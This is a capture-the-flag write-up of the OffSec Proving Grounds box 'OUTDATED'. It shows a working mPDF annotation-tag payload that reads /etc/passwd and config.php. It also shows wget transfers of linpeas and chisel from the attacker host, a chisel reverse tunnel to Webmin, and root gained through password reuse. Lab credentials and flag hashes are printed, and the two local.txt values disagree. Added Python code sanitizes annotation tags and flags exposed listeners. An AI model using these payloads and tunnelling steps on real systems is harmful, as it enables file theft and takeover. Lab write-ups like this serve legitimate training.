OFFSEC - Proving Grounds - OUTDATED

OFFSEC PG PRACTICE MPDF EXIFTOOL CHISEL WEBMIN

Summary

Get initial access using SSH with the provided credentials, or through the Convert HTML to PDF Online site on port 80. Using exiftool we can determine that mPDF 6.0 performs the conversion, for which a known exploit exists that embeds a file from the filesystem as a PDF attachment. Downloading config.php this way gives us the same credentials as provided by OFFSEC. Once on the box we find that port 10000 is listening and use chisel to forward this port to localhost port 10000. This provides access to the Webmin interface through credential reuse and allows privilege escalation to the root user.

Specifications

  • Name: OUTDATED
  • Platform: PG PRACTICE
  • Points: 5
  • Difficulty: Easy
  • System overview: Linux outdated 5.4.0-136-generic #153-Ubuntu SMP Thu Nov 24 15:56:58 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
  • IP address: 192.168.143.232
  • OFFSEC provided credentials: svc-account:best&_#Password@2021!!!
  • HASH: local.txt:27775aba8d80e246da68b9c306ba4c59
  • HASH: proof.txt:49ff4abfed6efcf69fa250ea34a2ad41

Preparation

First we’ll create a directory structure for our files, set the IP address to a bash variable and ping the target:

## create directory structure
mkdir outdated && cd outdated && mkdir enum files exploits uploads tools

## list directory
ls -la

total 28
drwxrwxr-x  7 kali kali 4096 Aug 26 11:01 .
drwxrwxr-x 42 kali kali 4096 Aug 26 11:01 ..
drwxrwxr-x  2 kali kali 4096 Aug 26 11:01 enum
drwxrwxr-x  2 kali kali 4096 Aug 26 11:01 exploits
drwxrwxr-x  2 kali kali 4096 Aug 26 11:01 files
drwxrwxr-x  2 kali kali 4096 Aug 26 11:01 tools
drwxrwxr-x  2 kali kali 4096 Aug 26 11:01 uploads

## set bash variable
ip=192.168.143.232

## ping target to check if it's online
ping $ip

PING 192.168.143.232 (192.168.143.232) 56(84) bytes of data.
64 bytes from 192.168.143.232: icmp_seq=1 ttl=61 time=17.6 ms
64 bytes from 192.168.143.232: icmp_seq=2 ttl=61 time=17.0 ms
^C
--- 192.168.143.232 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 16.979/17.295/17.612/0.316 ms

Reconnaissance

Portscanning

Using Rustscan we can see what TCP ports are open. This tool is part of my default portscan flow.

## run the rustscan tool
sudo rustscan -a $ip | tee enum/rustscan

.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Exploring the digital landscape, one IP at a time.

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 192.168.143.232:22
Open 192.168.143.232:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-26 11:02 CEST
Initiating Ping Scan at 11:02
Scanning 192.168.143.232 [4 ports]
Completed Ping Scan at 11:02, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:02
Completed Parallel DNS resolution of 1 host. at 11:02, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 11:02
Scanning 192.168.143.232 [2 ports]
Discovered open port 80/tcp on 192.168.143.232
Discovered open port 22/tcp on 192.168.143.232
Completed SYN Stealth Scan at 11:02, 0.05s elapsed (2 total ports)
Nmap scan report for 192.168.143.232
Host is up, received echo-reply ttl 61 (0.019s latency).
Scanned at 2025-08-26 11:02:24 CEST for 1s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 61
80/tcp open  http    syn-ack ttl 61

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds
           Raw packets sent: 6 (240B) | Rcvd: 3 (116B)

Copy the output of open ports into a file called ports within the files directory.

## edit the `files/ports` file
nano files/ports

## content `ports` file:
22/tcp open  ssh     syn-ack ttl 61
80/tcp open  http    syn-ack ttl 61

Run the following command to get a comma-separated string of all open ports, then paste that output into the NMAP command:

## get a list, comma separated of the open port(s)
cd files && cat ports | cut -d '/' -f1 > ports.txt && awk '{printf "%s,",$0;n++}' ports.txt | sed 's/.$//' > ports && rm ports.txt && cat ports && cd ..

## output previous command
22,80

## use this output in the `nmap` command below:
sudo nmap -T3 -p 22,80 -sCV -vv $ip -oN enum/nmap-services-tcp

Output of NMAP:

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
|   256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI0EdIHR7NOReMM0G7C8zxbLgwB3ump+nb2D3Pe3tXqp/6jNJ/GbU2e4Ab44njMKHJbm/PzrtYzojMjGDuBlQCg=
|   256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDCc0saExmeDXtqm5FS+D5RnDke8aJEvFq3DJIr0KZML
80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Convert HTML to PDF Online
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Initial Access

Initial Access: path 1

22/tcp open  ssh     syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
|   256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI0EdIHR7NOReMM0G7C8zxbLgwB3ump+nb2D3Pe3tXqp/6jNJ/GbU2e4Ab44njMKHJbm/PzrtYzojMjGDuBlQCg=
|   256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDCc0saExmeDXtqm5FS+D5RnDke8aJEvFq3DJIr0KZML

Because we got credentials (svc-account:best&_#Password@2021!!!) from OFFSEC, we first try to log in using SSH on TCP port 22. Connect with the following command and paste the password when asked. Once logged in we find the local.txt file in the home directory of the svc-account user.

## login using SSH with provided credentials: `svc-account:best&_#Password@2021!!!`
ssh svc-account@$ip                     
svc-account@192.168.143.232's password: 
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-136-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue 26 Aug 2025 09:03:03 AM UTC

  System load:  0.0               Processes:               214
  Usage of /:   62.2% of 9.74GB   Users logged in:         0
  Memory usage: 30%               IPv4 address for ens160: 192.168.143.232
  Swap usage:   0%


0 updates can be applied immediately.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

svc-account@outdated:~$ 

## print current working directory
svc-account@outdated:~$ pwd
/home/svc-account

## list content current directory
svc-account@outdated:~$ ls -la
total 28
drwxr-xr-x 3 svc-account svc-account 4096 Aug 26 09:03 .
drwxr-xr-x 3 root        root        4096 Jan 12  2023 ..
lrwxrwxrwx 1 svc-account svc-account    9 Jan 12  2023 .bash_history -> /dev/null
-rw-r--r-- 1 svc-account svc-account  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 svc-account svc-account 3771 Feb 25  2020 .bashrc
drwx------ 2 svc-account svc-account 4096 Aug 26 09:03 .cache
-rw------- 1 svc-account svc-account   33 Aug 26 08:55 local.txt
-rw-r--r-- 1 svc-account svc-account  807 Feb 25  2020 .profile

## print `local.txt`
svc-account@outdated:~$ cat local.txt
27775aba8d80e246da68b9c306ba4c59

Initial Access: path 2

80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Convert HTML to PDF Online
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)

When we visit http://192.168.143.232/ in the browser, we get a Convert HTML to PDF Online form.

When we enter test and click on Convert, the text is converted to PDF. Saving the PDF gives it the name mpdf.pdf. Let’s save it to the files directory.

Change directory and run exiftool to see more details on the generated PDF file.

## change directory
cd files

## run exiftool on `mpdf.pdf`
exiftool mpdf.pdf
ExifTool Version Number         : 13.25
File Name                       : mpdf.pdf
Directory                       : .
File Size                       : 15 kB
File Modification Date/Time     : 2025:08:26 11:04:23+02:00
File Access Date/Time           : 2025:08:26 11:04:23+02:00
File Inode Change Date/Time     : 2025:08:26 11:04:23+02:00
File Permissions                : -rw-rw-r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Page Count                      : 1
Page Layout                     : OneColumn
Producer                        : mPDF 6.0
Create Date                     : 2025:08:26 10:04:14+01:00
Modify Date                     : 2025:08:26 10:04:14+01:00

We can see it’s created with mPDF 6.0. Searching the internet we find https://github.com/mpdf/mpdf/issues/356, which describes how to get local file inclusion (LFI) by adding an annotation tag to the submitted text. The example given attaches /etc/passwd. Let’s add this to the text in the browser.

## add this content to text
The PDF is dark and full of attachments  
 <annotation file="/etc/passwd" content="/etc/passwd"  icon="Graph" title="Attached File: /etc/passwd" pos-x="195" />

Enter this as the text in the form and click on Convert.

Again, a PDF is created, but now with an attachment.

When we save the attachment (passwd) in the files directory we indeed see that the /etc/passwd was attached.

## change directory
cd files

## print `passwd` file
cat passwd                                                                                                                         
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
fwupd-refresh:x:113:117:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
svc-account:x:1000:1000::/home/svc-account:/bin/bash

What now? Let’s run gobuster to see if there is anything interesting on the web application. Indeed, there is a config directory at http://192.168.143.232/config/. Browsing this directory shows a file called config.php. Let’s download it the same way as before: change the file path in the payload, click on Convert, save the attachment and print it. This gives us the same credentials as provided by OFFSEC: svc-account:best&_#Password@2021!!!. Use SSH to connect to the target with the found credentials, get a shell as the svc-account user and print local.txt.

## run gobuster on the web application
gobuster dir -t 100 -u http://$ip:80/ -w /opt/SecLists/Discovery/Web-Content/raft-large-directories.txt | tee enum/raft-large-dir-raw-80
tee: enum/raft-large-dir-raw-80: No such file or directory
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.143.232:80/
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/config               (Status: 301) [Size: 319] [--> http://192.168.143.232/config/]
<SNIP>

## payload adapted to the `./config/config.php` file 
The PDF is dark and full of attachments  
 <annotation file="./config/config.php" content="./config/config.php"  icon="Graph" title="Attached File: ./config/config.php" pos-x="195" />

## print `config.php` 
cat config.php 
<?php
/* todo: check if still required
$servername = "localhost";
$username = "svc-account";
$password = "best&_#Password@2021!!!";
$dbname = "project";

$conn = new mysqli($servername, $username, $password, $dbname);

if ($conn->connect_error) {
    die("Connection failed: " . $conn->connect_error);
}
*/ 

## connect to the target with the found credentials
ssh svc-account@$ip
svc-account@192.168.143.232's password: 
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-136-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue 26 Aug 2025 09:06:13 AM UTC

  System load:  0.17              Processes:               218
  Usage of /:   62.2% of 9.74GB   Users logged in:         0
  Memory usage: 33%               IPv4 address for ens160: 192.168.143.232
  Swap usage:   0%


0 updates can be applied immediately.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue Aug 26 09:03:04 2025 from 192.168.45.237
svc-account@outdated:~$ 

## print `local.txt`
svc-account@outdated:~$ cat local.txt 
2d551d21de176f6dfb9472a17167fddc
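The file disclosure above works because the converter passes user input straight to mPDF, where an annotation tag with a file attribute makes mPDF embed a server-side file. As an added example (not code from the write-up or from mPDF), this is the converter-side check a defender would put in front of the PDF library: escape the input entirely when only plain text is expected, otherwise strip annotation tags, and in both cases report what was attempted. The sample input is the write-up's own payload, reused here as constructed test data; function names are my own.

```python
"""Pre-conversion check for HTML handed to mPDF: an <annotation file="..."> tag
makes mPDF embed the named server-side file in the PDF, so the converter must
refuse or strip such tags before calling the library."""
import html
import re
from html.parser import HTMLParser

# Payload from the write-up, reused here as constructed test input.
SAMPLE_INPUT = (
    "The PDF is dark and full of attachments\n"
    ' <annotation file="/etc/passwd" content="/etc/passwd"  icon="Graph" '
    'title="Attached File: /etc/passwd" pos-x="195" />\n'
)


class _AnnotationFinder(HTMLParser):
    """Collects the file attribute of every <annotation> tag in the input.
    HTMLParser lowercases tag and attribute names, and self-closing
    "<annotation ... />" tags are routed through handle_starttag as well."""

    def __init__(self):
        super().__init__()
        self.files = []

    def handle_starttag(self, tag, attrs):
        if tag == "annotation":
            self.files.append(dict(attrs).get("file") or "")


def find_file_annotations(user_html):
    """Return the file paths requested by <annotation> tags (for logging/alerting)."""
    finder = _AnnotationFinder()
    finder.feed(user_html)
    finder.close()
    return finder.files


# Matches the tag itself plus an optional explicit closing tag.
_ANNOTATION_RE = re.compile(r"<annotation\b[^>]*>(?:\s*</annotation>)?", re.IGNORECASE)


def strip_annotations(user_html):
    """Remove annotation tags entirely, so mPDF has nothing to attach."""
    return _ANNOTATION_RE.sub("", user_html)


def sanitize_for_mpdf(user_html, allow_markup=False):
    """Converter policy: with allow_markup=False the input is treated as plain
    text and fully escaped; otherwise only annotation tags are stripped.
    Returns (safe_html, requested_files) so the caller can log attempts."""
    requested = find_file_annotations(user_html)
    if not allow_markup:
        return html.escape(user_html), requested
    return strip_annotations(user_html), requested
```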

Privilege Escalation

Let’s upload linpeas.sh to the target and run it.

## change directory locally
cd uploads

## download latest version of linpeas.sh
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh

## get local IP address on tun0
ip a | grep -A 10 tun0
7: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
    link/none 
    inet 192.168.45.237/24 scope global tun0
       valid_lft forever preferred_lft forever
    inet6 fe80::5ec4:b9ef:93d2:8888/64 scope link stable-privacy proto kernel_ll 
       valid_lft forever preferred_lft forever

## start local webserver
python3 -m http.server 80

## on target
## download `linpeas.sh`
svc-account@outdated:~$ wget http://192.168.45.237/linpeas.sh
--2025-08-26 09:08:12--  http://192.168.45.237/linpeas.sh
Connecting to 192.168.45.237:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 956174 (934K) [text/x-sh]
Saving to: ‘linpeas.sh’

linpeas.sh                         100%[=============================================================>] 933.76K  5.28MB/s    in 0.2s    

2025-08-26 09:08:12 (5.28 MB/s) - ‘linpeas.sh’ saved [956174/956174]

## set the execution bit
svc-account@outdated:~$ chmod +x linpeas.sh 

## run `linpeas.sh`
svc-account@outdated:~$ ./linpeas.sh

The linpeas.sh output shows that port 10000 is listening on the target. We can verify this using the ss command. Let’s use chisel to forward port 10000 to our local port 10000. First we need to download chisel from https://github.com/jpillora/chisel/releases and copy it to the uploads directory.

## list TCP sockets on the target
svc-account@outdated:~$ ss -ant
State            Recv-Q         Send-Q                   Local Address:Port                    Peer Address:Port         Process         
LISTEN           0              4096                           0.0.0.0:10000                        0.0.0.0:*                            
LISTEN           0              511                            0.0.0.0:80                           0.0.0.0:*                            
LISTEN           0              4096                     127.0.0.53%lo:53                           0.0.0.0:*                            
LISTEN           0              128                            0.0.0.0:22                           0.0.0.0:*                            
ESTAB            0              36                     192.168.143.232:22                    192.168.45.237:53758                        
SYN-SENT         0              1                      192.168.143.232:48490                   91.189.91.43:443    

## change directory
cd uploads

## move file to `uploads` directory
mv ~/Downloads/chisel_1.10.1_linux_amd64.gz .

## gunzip this archive
gunzip chisel_1.10.1_linux_amd64.gz

## rename to `chisel`
mv chisel_1.10.1_linux_amd64 chisel

## set execution bit
chmod +x chisel

## get local IP address on tun0
ip a | grep -A 10 tun0
7: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
    link/none 
    inet 192.168.45.237/24 scope global tun0
       valid_lft forever preferred_lft forever
    inet6 fe80::5ec4:b9ef:93d2:8888/64 scope link stable-privacy proto kernel_ll 
       valid_lft forever preferred_lft forever

## start local webserver
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

## run chisel server on port 9000
./chisel server --reverse -p 9000
2025/08/26 11:22:35 server: Reverse tunnelling enabled
2025/08/26 11:22:35 server: Fingerprint 6+mf3TLZDV0pODhSucbfzlUw/217OuZ7wwvqEmnXNF4=
2025/08/26 11:22:35 server: Listening on http://0.0.0.0:9000

## on target:
## download chisel
svc-account@outdated:~$ wget http://192.168.45.237/chisel
--2025-08-26 09:22:14--  http://192.168.45.237/chisel
Connecting to 192.168.45.237:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9371800 (8.9M) [application/octet-stream]
Saving to: ‘chisel’

chisel                             100%[=============================================================>]   8.94M  8.19MB/s    in 1.1s    

2025-08-26 09:22:15 (8.19 MB/s) - ‘chisel’ saved [9371800/9371800]

## set execution bit
chmod +x chisel

## connect to chisel server and port forward 10000 to local 10000
svc-account@outdated:~$ ./chisel client 192.168.45.237:9000 R:10000:127.0.0.1:10000
2025/08/26 09:23:30 client: Connecting to ws://192.168.45.237:9000
2025/08/26 09:23:31 client: Connected (Latency 19.271847ms)

Now that the port forward is ready, open https://localhost:10000/ in the browser (note HTTPS) and we see the login page for Webmin.

Default credentials don’t work, so perhaps the password is reused. Trying svc-account:best&_#Password@2021!!! indeed logs us in. Now click on the Command shell button to get a shell as the root user.

## print the current user
[svc-account@outdated ~]# whoami
root

## print `proof.txt`
[svc-account@outdated ~]# cat /root/proof.txt
49ff4abfed6efcf69fa250ea34a2ad41
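The escalation above hinges on Webmin listening on 0.0.0.0:10000: the external scan saw only ports 22 and 80, but once a foothold exists a reverse tunnel reaches the management port, and the reused password does the rest. As an added example (not from the write-up), this script parses `ss -ant` output and reports listeners bound to all interfaces that are outside the intended exposure set; the sample rows are copied from the write-up's own ss output, and the intended set {22, 80} is an assumption for this box.

```python
"""Exposure check: flag services bound to every interface that the owner did
not intend to expose. On this box Webmin on 0.0.0.0:10000 is such a service;
binding it to 127.0.0.1 or a management network would have removed the path."""
from dataclasses import dataclass

# Rows copied from the write-up's `ss -ant` output (constructed sample input).
SS_SAMPLE = """State  Recv-Q Send-Q Local Address:Port   Peer Address:Port Process
LISTEN 0      4096         0.0.0.0:10000        0.0.0.0:*
LISTEN 0      511          0.0.0.0:80           0.0.0.0:*
LISTEN 0      4096   127.0.0.53%lo:53           0.0.0.0:*
LISTEN 0      128          0.0.0.0:22           0.0.0.0:*
ESTAB  0      36   192.168.143.232:22    192.168.45.237:53758
"""

# Addresses ss prints for "bound to all interfaces" (IPv4 and IPv6 forms).
ANY_ADDRS = {"0.0.0.0", "*", "::", "[::]"}


@dataclass(frozen=True)
class Listener:
    addr: str
    port: int

    @property
    def on_all_interfaces(self):
        return self.addr in ANY_ADDRS


def split_addr_port(field):
    """'127.0.0.53%lo:53' -> ('127.0.0.53', 53); '[::]:22' -> ('[::]', 22)."""
    addr, _, port = field.rpartition(":")
    addr = addr.split("%", 1)[0]  # drop the interface scope suffix
    return addr, int(port)


def parse_listeners(ss_output):
    """Return a Listener for every LISTEN row of `ss -ant` output."""
    listeners = []
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0] != "LISTEN":
            continue  # header row, established connections, blank lines
        addr, port = split_addr_port(fields[3])
        listeners.append(Listener(addr, port))
    return listeners


def unexpected_exposure(ss_output, intended_ports):
    """Ports listening on all interfaces that are not in the intended set.
    The write-up's box yields [10000] for intended_ports={22, 80}."""
    return sorted(
        lst.port
        for lst in parse_listeners(ss_output)
        if lst.on_all_interfaces and lst.port not in intended_ports
    )


if __name__ == "__main__":
    print("unexpected exposure:", unexpected_exposure(SS_SAMPLE, {22, 80}))
```

Loopback-only listeners such as systemd-resolved on 127.0.0.53:53 are deliberately not reported, since they are only reachable from the host itself.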

References

[+] https://github.com/mpdf/mpdf/issues/356
[+] https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
[+] https://github.com/jpillora/chisel/releases
